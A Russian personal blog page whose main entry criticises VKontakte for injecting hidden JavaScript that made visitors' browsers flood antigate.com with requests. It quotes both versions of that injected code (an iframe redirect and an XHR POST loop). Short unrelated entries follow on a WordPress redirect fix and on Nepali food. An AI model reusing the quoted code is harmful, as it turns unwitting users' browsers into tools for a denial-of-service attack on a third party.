Рубрика: Ежедневные записи

ВКонтакте ДДОСит antigate

Сегодня юзер с сайта roem.ru обнаружил что на страницах социальной сети ВКонтакте появился код, который без ведома пользователя шлет запросы на сайт antigate.com. Зачем это? Чтобы вывести сайт antigate из строя множеством запросов, это называется DDOS-атакой. Пользователи ВКонтакте были поневоле вовлечены в уголовно наказуемое преступление, а их компьютеры были подвергнуты возможности заражения вирусами.

Выглядит это вот так:

function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>this.location="http://ant'+'iga'+'te.com/i'+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}

<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">

Вообще, при такой ламерской организации атаки, antigate мог бы продать весь трафик в какой-нибудь ботнет, и неплохо заработать, но antigate поступил более прикольно — сделав редирект на порносайт из iframe :) В итоге, ничего не подозревающий пользователь ВКонтакте, открывая vk.com, оказывался на порносайте.

После этого ВКонтактовцы убрали код, но лишь затем чтобы установить новый, через который уже тяжело причинить вред пользователю ВКонтакте:

function _test(){var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open("POST","http://ant'+'iga'+'te.com/i'+'n.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98";for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);}

Не нужно говорить, наверное, что если бы Facebook перенаправлял своих пользователей на порносайт, хотя бы несколько секунд, то это событие получило бы большую огласку. У нас же в новостях пусто.

Можно долго спорить о том что antigate помогает спамерам, и хорошо ли его заддосить. Дело не в том какой сайт подвергся атаке, а в том что в цивилизованной стране (мы ведь хотим чтобы Россия была цивилизованной страной) крупнейшая социальная сеть, не уведомляя своих пользователей, во-первых вовлекает их в уголовно наказуемое преступление, во-вторых подвергает риску заражения вирусами их компьютеры, и в-третьих расходует их трафик, за который пользователи платят деньги.

Мне кажется методы братков из 90-х недопустимы в цивилизованном обществе.

Исправления ошибок Google Webmaster вида http://site.ru/http://site.ru/ для WordPress

Изучал ошибки своего блога в Google Webmaster Tools и заметил группу ошибок вида:

disassembly/kak-razobrat-telefon-nokia-6233/http%3A%2F%2Fpaulov.ru%2Fdisassembly%2Fkak-razobrat-telefon-nokia-6233%2F 404 3/13/12
motors/sobiraem_richag_akpp_montero_pajero/http%3A%2F%2Fpaulov.ru%2Fmotors%2Fsobiraem_richag_akpp_montero_pajero%2F 404 3/15/12
disassembly/kak_razobrat_telefon_siemens_s65/http%3A%2F%2Fpaulov.ru%2Fdisassembly%2Fkak_razobrat_telefon_siemens_s65%2F 404 3/14/12
disassembly/kak-razobrat-telefon-nokia-6300/http%3A%2F%2Fpaulov.ru%2Fdisassembly%2Fkak-razobrat-telefon-nokia-6300%2F 404 3/12/12

Найти эти ссылки в коде страниц невозможно, и непонятно откуда они берутся. Очевидно что их внедряет в код некий плагин. Пока выясняю это придумал решение-костыль, который нужно сунуть в functions.php вашей темы:

if ( preg_match( '/\/http(?:\\:\/\/|%3A%2F%2F)www\\.free-writer\\.ru/', $_SERVER['REQUEST_URI'] ) ) {

	$fm = array();
	if ( preg_match( '/\/(http(?:\\:\/\/|%3A%2F%2F)www\\.free-writer\\.ru.*)/', $_SERVER['REQUEST_URI'], $fm ) && isset( $fm[1] ) && $fm[1] ) {

		header('HTTP/1.0 301 Moved Permanently');
		header('Location: '. urldecode( $fm[1] ) );
		die;

	}
}

Поиски продолжаются :)

Непальский частный сектор

Непальцы выращивают пшеницу в огороде.

image
непал, пшеница в огороде
image
непал, пшеница в огороде

Тестирую добавление записей с Андроида. )

Пьём непальский кефир

image

Непальский кефир. Называется дои, продается в магазинах по цене ~40 непальских купий за пакет. На вкус напоминает российский кефир, только очень густой и от этого непривычный ) думается что ласси (местный кисломолочный напиток, который можно заказать в любом ресторане) это разбавленный дои.